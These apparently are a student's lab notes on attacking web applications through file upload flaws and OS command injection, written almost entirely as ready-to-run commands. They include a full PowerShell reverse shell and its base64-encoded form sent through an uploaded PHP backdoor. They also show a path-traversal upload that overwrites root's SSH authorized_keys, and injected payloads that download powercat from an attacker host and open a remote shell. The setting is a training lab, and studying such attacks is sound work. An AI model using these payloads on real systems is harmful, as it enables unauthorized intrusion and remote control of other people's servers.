Common Web Application Attacks

File Upload Vulnerabilities

Using Executable Files

upload files to be run by the web server, change the file extension such as pHP

upload: /usr/share/webshells/php/simple-backdoor.php

PowerShell one-liner (powershell_reverse_shell.ps1):
$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

pwsh

$Text = '$client = New-Object System.Net.Sockets.TCPClient("192.168.119.3",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)

$EncodedText =[Convert]::ToBase64String($Bytes)

$EncodedText

exit

nc -nvlp 4444

curl http://192.168.50.189/meteor/uploads/simple-backdoor.php?cmd=powershell%20-enc%20JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0
...
AYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA

-------
Using Non-Executable Files

ssh-keygen
fileup
cat fileup.pub > authorized_keys

upload: filename="../../../../../../../root/.ssh/authorized_keys"

rm ~/.ssh/known_hosts
ssh -p 2222 -i fileup root@mountaindesserts.com
yes

----
Command Injection

OS Command Injection

curl -X POST --data 'Archive=ipconfig' http://192.168.50.189:8000/archive

curl -X POST --data 'Archive=git version' http://192.168.50.189:8000/archive
Windows or Linux (in this case, Windows)

curl -X POST --data 'Archive=git%3Bipconfig' http://192.168.50.189:8000/archive
(%3B ;)
(https://www.urlencoder.org/)

curl -X POST --data 'Archive=git%26%26ipconfig' http://192.168.50.189:8000/archive
(%26%26 &&)

curl -X POST --data 'Archive=git%3B(dir%202%3E%261%20*%60%7Cecho%20CMD)%3B%26%3C%23%20rem%20%23%3Eecho%20PowerShell' http://192.168.50.189:8000/archive
((dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell)
CMD or Powershell (in this case, Powershell)

cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .
python3 -m http.server 80
nc -nvlp 4444

IEX (New-Object System.Net.Webclient).DownloadString("http://192.168.119.3/powercat.ps1");powercat -c 192.168.119.3 -p 4444 -e powershell 

curl -X POST --data 'Archive=git%3BIEX%20(New-Object%20System.Net.Webclient).DownloadString(%22http%3A%2F%2F192.168.119.3%2Fpowercat.ps1%22)%3Bpowercat%20-c%20192.168.119.3%20-p%204444%20-e%20powershell' http://192.168.50.189:8000/archive






